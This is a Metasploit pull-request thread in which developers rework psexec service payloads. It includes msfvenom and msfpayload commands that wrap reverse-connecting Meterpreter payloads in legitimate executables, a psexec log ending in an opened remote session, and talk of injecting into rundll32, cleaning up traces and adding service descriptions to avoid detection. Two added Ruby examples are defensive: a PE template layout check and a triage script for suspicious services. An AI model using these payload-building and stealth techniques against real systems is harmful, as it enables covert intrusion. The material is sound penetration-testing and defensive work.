rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Refreshed service payloads #2657

Closed agix closed 10 years ago

agix commented 10 years ago

Here is the refreshed pull request for service payload related to https://github.com/rapid7/metasploit-framework/pull/1850/

Verification

agix commented 10 years ago

Thank you for all these comments. I'll work on it right now!

agix commented 10 years ago

Okay, here is my first try. I hope I didn't forget anything.

About the breaking name (if it's under 7): I think it's a bad idea to force it like that. I will try to generate the shellcode depending on the name size with the right opcodes automatically. I think it's the best option, what do you think?

agix commented 10 years ago

I know this is not the place to put the "string_to_pushes(str)" function, so just tell me where I have to write it? thx

Meatballs1 commented 10 years ago

There are plenty of low level functions in Util::EXE so it shouldn't be too out of place (e.g. self.generate_nop), so I don't see any particular issues with it going in there for now if it's the only thing using it. @dmaloney-r7 might have some suggestions?

Util::EXE could use a refactor anyway as it's become a one stop shop for most payload generation...

agix commented 10 years ago

Okay, I fixed the service payload and tested the psexec module with different service name/file/displayname. I'm waiting for your comments. Everything works well.

wvu commented 10 years ago

Thanks, @agix. Bumping.

Meatballs1 commented 10 years ago

Works ok for psexec so far:

[*] Started reverse handler on 192.168.1.22:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.1.23:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \bbRHayOj.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.23[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.23[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (lotsofcharacters - "Test_Display")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (769024 bytes) to 192.168.1.23
[*] Deleting \bbRHayOj.exe...
[*] Meterpreter session 3 opened (192.168.1.22:4444 -> 192.168.1.23:49214) at 2014-01-02 14:24:43 +0000

Meatballs1 commented 10 years ago

Everything seems to be working as intended so far, however my main concern is the change in functionality between the existing service template and the newly generated executables.

Currently the service executables execute the shellcode in a new process, and exit cleanly (informing the service manager etc). This is desirable as it means we can clean up the service, which we can't do if the process is still running, and I think this is assumed by some modules...

agix commented 10 years ago

Hey, yes I thought of it. If you add the migrate shellcode, it successfully removes the service. Is there a way to force prepend_migrate? Do you think it's a good idea? About the author of service_stuff.asm, it's a copy paste of the other one made by Stephen Fewer, so that's why I didn't change it.

Meatballs1 commented 10 years ago

Prepend migrate doesn't work correctly for all payloads at present when it is generated and would require changing a lot of module defaults.

I guess it could be manually included as part of this shellcode along with the calls to stop the service and ExitProcess? Probably want someone else to weigh in @jlee-r7 ?

Another thing I have noticed is that a template file doesn't work with this, (or exe-only for that matter). I'm currently using notepad.exe (correct Arch). Do they need to be unsigned or something? I have tried with a random 3rd party one but it doesn't work. Although it doesn't appear to be this PR that breaks it...

Meatballs1 commented 10 years ago

Looks like injection doesn't work with exe and notepad.exe either... They work under Wine, just not under windows :)

agix commented 10 years ago

If I understood you: injection doesn't work, but injection is not the same as using another template.

./msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.56.1 R | ./msfencode -t exe-only -x /mnt/vm/firefox.exe -o /mnt/vm/firefox_bd.exe

uses firefox as template and it works.

./msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.56.1 R | ./msfencode -t exe-only -x /mnt/vm/firefox.exe -o /mnt/vm/firefox_bd.exe -k

tries to keep the template working, and it doesn't work with exe-only.

Meatballs1 commented 10 years ago

I'm using msfvenom -p windows/meterpreter/reverse_tcp -f exe-only -x /root/notepad.exe LHOST=192.168.1.x > blah

That sets the correct template... I'll try with payload/encode

agix commented 10 years ago

Okay, I never tried msfvenom. And I said bullshit about -k. exe-only doesn't take care of the -k option, it does the same. So that's strange, what's the difference between msfvenom and msfpayload | msfencode?

agix commented 10 years ago

msfvenom works for me... ./msfvenom -p windows/meterpreter/reverse_tcp -f exe-only -x /mnt/vm/firefox.exe LHOST=192.168.56.1 > /mnt/vm/firefox_bd2.exe

on windows XP sp3 fr under virtualbox.

agix commented 10 years ago

It works with notepad.exe too...

Meatballs1 commented 10 years ago

Which version of windows are you testing with? Windows 7 notepad here

Meatballs1 commented 10 years ago

Using the XP notepad seems to work fine, I guess something gets hammered with the Win7 notepad/calc. Maybe some of the tables which appear to be stored in .text as well?

agix commented 10 years ago

So it's just a matter of template? Should I change something? Is it working with the Win7 notepad.exe with msfpayload | msfencode? If yes, that's really strange. Otherwise, my antivirus tests taught me that you should not use a native Windows PE as a template; some AVs do a whitelist and warn the user if you change just one byte in calc.exe, for instance.

Anyway, I'm looking on the shellcode to improve the service management.

Meatballs1 commented 10 years ago

msfpayload|msfencode worked first time, but then wouldn't work again... I may have mis-copied the file or maybe it was lucky and corrupted the file in a way it still worked? Too much generating payloads and copying them around...

I don't think it's a concern for this PR: the 'exe' technique couldn't handle notepad/calc and so I wouldn't expect 'exe-only' to.

agix commented 10 years ago

Oki, good. So I think it will be better to create another shellcode block (create_remote_process for instance) that does CreateProcess(CREATE_SUSPENDED), WriteProcessMemory(shellcode), ResumeThread, Exit. Using it with psexec will allow C:\Windows\meterpreter.exe to be removed.

Then I will work on the SvcCtrl... Some work to do hehe!

For PeParsey, do you think it should be changed?

Meatballs1 commented 10 years ago

Using PeParsey is not a priority for this PR as the goal isn't to clean up exe-only.

agix commented 10 years ago

Here it is: now the service is started, then a remote rundll32.exe process with the original shellcode injected in it is started. Then the service exits.

Now, the executable is automatically removed from C:\WINDOWS\ and the service is also removed from the service list. BUT an error appears in the log saying "service stopped unexpectedly".

It's not perfect... just tell me what you think about my "create_remote_process" block. I will improve the whole thing.

agix commented 10 years ago

Okay, we are almost good, I think. Now, the service is created, runs, injects the original shellcode in a new process (rundll32.exe), runs it, is "stopped" and exits. The binary is removed from C:\WINDOWS and the service disappears.

Be careful, the payload is now quite big and crashes with the exe-only technique if you choose a template that doesn't contain enough code (notepad.exe and winmine.exe are too short; I used firefox.exe).

I'm waiting for your suggestion.

Meatballs1 commented 10 years ago

Awesome, I used dxdiag from Windows XP:

C:\Users\Administrator>sc start aservice1

SERVICE_NAME: aservice1
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1452
        FLAGS              :

C:\Users\Administrator>sc query aservice1

SERVICE_NAME: aservice1
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Fires off into rundll32.exe nicely.

Meatballs1 commented 10 years ago

With psexec it works fine, but there is a noticeable delay uploading the file with a 1MB+ file :)

Meatballs1 commented 10 years ago

Doesn't appear to be as happy with reverse_https, it works with reverse_http and the default template and with WinXP dxdiag.exe.

Is reverse_https just too big? I did get a shell once, but it was unresponsive...

This may be a problem with the payload 'space' in psexec...

Yes looks like they are fine if generated by command line tool, I think it would probably be worthwhile calculating a sane 'space' for psexec to match this commit?

agix commented 10 years ago

If there is a problem of 'space', it runs and stops silently... I didn't find yet how to check if there is enough 'space'.

And that's right, with big files, it takes some time...

I don't think I can improve this, maybe optimizing my shellcode a little bit but I'm sure it's pointless.

Could be a big problem if we add encoding to this stub... the shellcode will be bigger.

I will investigate a little bit more, it seems unlikely to miss some space.

Meatballs1 commented 10 years ago

@agix I edited my last comment to clarify some things.

agix commented 10 years ago

I tried reverse_https with firefox.exe as a template, it works. I didn't understand what you mean by "looks like they are fine if generated by command line tool". It works if you use msfvenom? And it didn't work using exploit/windows/smb/psexec?

Meatballs1 commented 10 years ago

Yes, that's correct, reverse_https works with msfvenom and fails with psexec.

I increased the 'size' option in psexec to '5000' and then it started working.

agix commented 10 years ago

What's the size option in psexec? I don't follow you :). I found the problem: when the import table is in the same section as the entry point and the entry point is too close to the import table, it crashes... I will add this check in exe-only generation.

Meatballs1 commented 10 years ago

'size' line 61: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/psexec.rb

agix commented 10 years ago

Mmh oki, so we could increase this size, right? It depends on the template. If I do the correct check for the space between the entry point and the import table, it should fix everything, right?

Meatballs1 commented 10 years ago

Now I'm doing some re-testing and not having any issues with psexec and reverse_https - does it work ok for you?

It would be good to raise an Exception if the template has tables that would be overwritten by the payload :)

agix commented 10 years ago

I only tested psexec but it worked well. I agree, I'm working on it to raise the Exception and, if it's possible, in the case the payload overwrites the tables I will shift the entry point to another place to get enough space.

I do it tonight (french time) :D

agix commented 10 years ago

Okay, let's test this! No exception, just silently shifting the entry point to prevent import table overwriting. It works for me with winmine.exe and reverse_https on psexec.
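A worked version of the layout check discussed in the last few comments, added here as an example (it is not Metasploit's Util::EXE code and does not use PeParsey): parse the PE32 headers, find the section holding the entry point, and measure how many bytes lie between the entry point and the import directory when both sit in the same section. A tiny PE header set is constructed inline so the check runs offline; the section layout, the RVAs and the `build_pe` / `room_at_entry` / `check_template` names are assumptions for this illustration. Reporting the collision, rather than shifting the entry point silently, is the "raise an Exception" option suggested above.

```ruby
# Added example, not Metasploit's own code. Builds a minimal, constructed
# PE32 header set (no real code inside) and measures the room between the
# entry point and the import directory, the collision the thread describes.

IMAGE_DIRECTORY_ENTRY_IMPORT = 1

# Constructed minimal PE32 image for demonstration only: DOS stub with
# e_lfanew, "PE\0\0", COFF header, 224-byte optional header, section table.
def build_pe(entry_rva:, import_rva:, import_size:, sections:)
  dos  = ('MZ' + "\0" * 58 + [0x40].pack('V')).b            # e_lfanew = 0x40
  coff = [0x14c, sections.size, 0, 0, 0, 224, 0x0102].pack('vvVVVvv')
  opt  = ("\0" * 224).b                                      # 96 bytes + 16 dirs * 8
  opt[0, 2]  = [0x10b].pack('v')                             # Magic = PE32
  opt[16, 4] = [entry_rva].pack('V')                         # AddressOfEntryPoint
  opt[92, 4] = [16].pack('V')                                # NumberOfRvaAndSizes
  opt[96 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, 8] = [import_rva, import_size].pack('VV')
  table = sections.map do |s|
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, raw/reloc/line ptrs,
    # reloc/line counts, Characteristics (code | execute | read).
    [s[:name], s[:vsize], s[:va], s[:vsize], 0, 0, 0, 0, 0, 0x60000020].pack('a8VVVVVVvvV')
  end.join
  (dos + "PE\0\0" + coff + opt + table).b
end

# Parse just enough of a PE32 image to locate the entry point, the import
# directory and the section table.
def parse_pe(bytes)
  raise ArgumentError, 'missing MZ signature' unless bytes[0, 2] == 'MZ'
  pe = bytes[0x3c, 4].unpack1('V')
  raise ArgumentError, 'missing PE signature' unless bytes[pe, 4] == "PE\0\0"
  nsec     = bytes[pe + 6, 2].unpack1('v')                   # NumberOfSections
  opt_size = bytes[pe + 20, 2].unpack1('v')                  # SizeOfOptionalHeader
  opt      = pe + 24
  raise ArgumentError, 'PE32 only' unless bytes[opt, 2].unpack1('v') == 0x10b
  entry = bytes[opt + 16, 4].unpack1('V')
  ndirs = bytes[opt + 92, 4].unpack1('V')
  import_rva, import_size =
    if ndirs > IMAGE_DIRECTORY_ENTRY_IMPORT
      bytes[opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT, 8].unpack('VV')
    else
      [0, 0]
    end
  sec_off  = opt + opt_size
  sections = Array.new(nsec) do |i|
    name, vsize, va = bytes[sec_off + i * 40, 16].unpack('Z8VV')
    { name: name, va: va, vsize: vsize }
  end
  { entry: entry, import_rva: import_rva, import_size: import_size, sections: sections }
end

def section_for(sections, rva)
  sections.find { |s| rva >= s[:va] && rva < s[:va] + s[:vsize] }
end

# Bytes available forward from the entry point before reaching the import
# directory (when it lies ahead in the same section) or the section end.
def room_at_entry(info)
  sec = section_for(info[:sections], info[:entry])
  return 0 if sec.nil?
  limit = sec[:va] + sec[:vsize]
  imp = section_for(info[:sections], info[:import_rva])
  if imp && imp.equal?(sec) && info[:import_rva] >= info[:entry]
    limit = [limit, info[:import_rva]].min
  end
  limit - info[:entry]
end

# :ok when `needed` bytes fit at the entry point; :import_table_in_the_way
# when they would run into the import directory (the silent crash above);
# :section_too_small when the section itself ends first.
def check_template(bytes, needed)
  info = parse_pe(bytes)
  return :ok if room_at_entry(info) >= needed
  imp = section_for(info[:sections], info[:import_rva])
  same = imp && imp.equal?(section_for(info[:sections], info[:entry]))
  same ? :import_table_in_the_way : :section_too_small
end

# Constructed layouts (assumed values, not from any real binary).
TEXT  = { name: '.text',  va: 0x1000, vsize: 0x3000 }
RDATA = { name: '.rdata', va: 0x4000, vsize: 0x1000 }
# Import directory only 0x300 bytes past the entry point, same section.
TIGHT = build_pe(entry_rva: 0x1100, import_rva: 0x1400, import_size: 0x80, sections: [TEXT, RDATA])
# Import directory in its own section: the rest of .text is free.
ROOMY = build_pe(entry_rva: 0x1100, import_rva: 0x4000, import_size: 0x80, sections: [TEXT, RDATA])

if __FILE__ == $0
  [['tight', TIGHT], ['roomy', ROOMY]].each do |label, img|
    puts "#{label}: room=#{room_at_entry(parse_pe(img))} check(1024)=#{check_template(img, 1024)}"
  end
end
```

`check_template` is the piece that would sit in front of any code that rewrites a template: the tight layout fails for a 1024-byte stub but passes for 512, the roomy one passes until the whole remainder of .text is asked for. A real image also needs the RVA-to-file-offset translation that the section table provides; this example stops at RVAs because the collision is a question of virtual layout.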

Meatballs1 commented 10 years ago

Working fine here - still get some crashes with some executables but it's more templating than was originally possible. The default template seems - advanced users should be testing executables before using them as templates anyway.

I have noticed that using psexec doesn't cleanup well with reverse_https exes. This is a fault with psexec module, it doesn't use filedropper and isn't flexible in its file cleanup delay etc.

I'm happy to land this, I just want to get the thumbs up from someone else (@todb-r7) as psexec is a beloved module and people would get upset if it broke :)

Meatballs1 commented 10 years ago

Ah block_service_stopped.asm is missing btw, can you include it please?

agix commented 10 years ago

Oh shit, I accidentally removed it :'( from my disk as well... I will rewrite it grrr... Do you think it's possible to increase the delay in psexec before removing the file? Or is it not the right solution?

mubix commented 10 years ago

Is a service description added with these new payloads? That was always one of the biggest giveaways when looking at the services list, one blank line.
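The blank description mubix points at, turned into a triage check from the defender's side, as an added example that is not part of this PR or of Metasploit: given records shaped like what the Service Control Manager's "service installed" event (System log, Event ID 7045) and the service configuration provide, score each new service on traits visible in the psexec run above: an empty description, an image dropped straight into the Windows directory rather than System32, an eight-letter random file name like the `\bbRHayOj.exe` in the log, and demand start. The records, the field names, the regexes and the threshold are constructed for this illustration.

```ruby
# Added example, not part of this PR. Constructed records approximating the
# fields a 7045 "service installed" event carries, plus the description read
# back from the service configuration. Not real telemetry.
INSTALLED_SERVICES = [
  { name: 'Spooler', image: 'C:\WINDOWS\System32\spoolsv.exe', start: 'auto',
    description: 'Loads files to memory for later printing.' },
  { name: 'lotsofcharacters', image: 'C:\WINDOWS\bbRHayOj.exe', start: 'demand',
    description: '' },
  { name: 'aservice1', image: 'C:\WINDOWS\dxdiag.exe', start: 'demand',
    description: '' },
  { name: 'BackupAgent', image: 'C:\Program Files\Backup\agent.exe', start: 'auto',
    description: '' },
].freeze

# Executable sitting directly in the Windows directory (no subfolder).
WIN_ROOT_EXE = /\A[a-z]:\\windows\\[^\\]+\.exe\z/i
# Eight letters then .exe, the shape of psexec's generated upload name.
RANDOM_NAME  = /\A[a-z]{8}\.exe\z/i

# Traits that, alone, are noisy but together match the pattern in the log.
def suspicious_traits(svc)
  traits = []
  traits << :blank_description if svc[:description].to_s.strip.empty?
  traits << :dropped_in_windows_root if svc[:image] =~ WIN_ROOT_EXE
  base = File.basename(svc[:image].tr('\\', '/'))
  traits << :random_file_name if base =~ RANDOM_NAME
  traits << :demand_start if svc[:start] == 'demand'
  traits
end

# Services whose trait count reaches the threshold, keyed by service name.
def triage(records, threshold: 2)
  records.map { |r| [r[:name], suspicious_traits(r)] }
         .select { |_, traits| traits.size >= threshold }
         .to_h
end

if __FILE__ == $0
  triage(INSTALLED_SERVICES).each { |name, traits| puts "#{name}: #{traits.join(', ')}" }
end
```

Any one trait is weak on its own (the constructed BackupAgent record has a blank description and is left alone), but two or more on a freshly installed service is worth a look; the two services from the log score three and four. Correlating the hit with a Service Control Manager "terminated unexpectedly" event (ID 7034) a moment later, which is the log error agix mentions, tightens it further.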

agix commented 10 years ago

WTF travis! And no, it doesn't change the blank service description. I wonder if it's in the binary or in the RPC call...

EDIT : Okay, it's in the binary, I will add this feature my friend ! haha

agix commented 10 years ago

The SERVICE_DESCRIPTION option needs more testing, actually I don't think it adds the service description, but I don't know why... OpenSCManager, then OpenService, then ChangeServiceConfig2(handler, SERVICE_CONFIG_DESCRIPTION, "Description"). It seems it can't find the registry entry linked with the binary.

Anyway, it may be possible to do it by RPC call...

agix commented 10 years ago

SERVICE_DESCRIPTION works now. I didn't succeed in calling ChangeServiceConfig2A using RPC. The third argument must be a pointer to a SERVICE_DESCRIPTIONA structure http://msdn.microsoft.com/en-us/library/cc245900.aspx and I don't know how to pass this structure via RPC...

Anyway, it's working with the payload, even if it would be better by RPC.

Meatballs1 commented 10 years ago

Hmmm, the description doesn't need to be embedded in the binary, wouldn't this be better handled as an extension to PSEXEC/other service modules to call ChangeServiceConfig2 or whatever the svcctl RPC call is, to set a description if people want?

Meatballs1 commented 10 years ago

I think this is good to go, but don't want to push ahead with something that affects psexec without some bigger guns weighing in. @todb-r7 ? :)

agix commented 10 years ago

So much suspense!!! :)

agix commented 10 years ago

I just tried to rebase on master to fix some issue https://bugs.gentoo.org/show_bug.cgi?id=503502

agix commented 10 years ago

Holy shit, I totally fucked this branch!

wvu commented 10 years ago

Holy crap.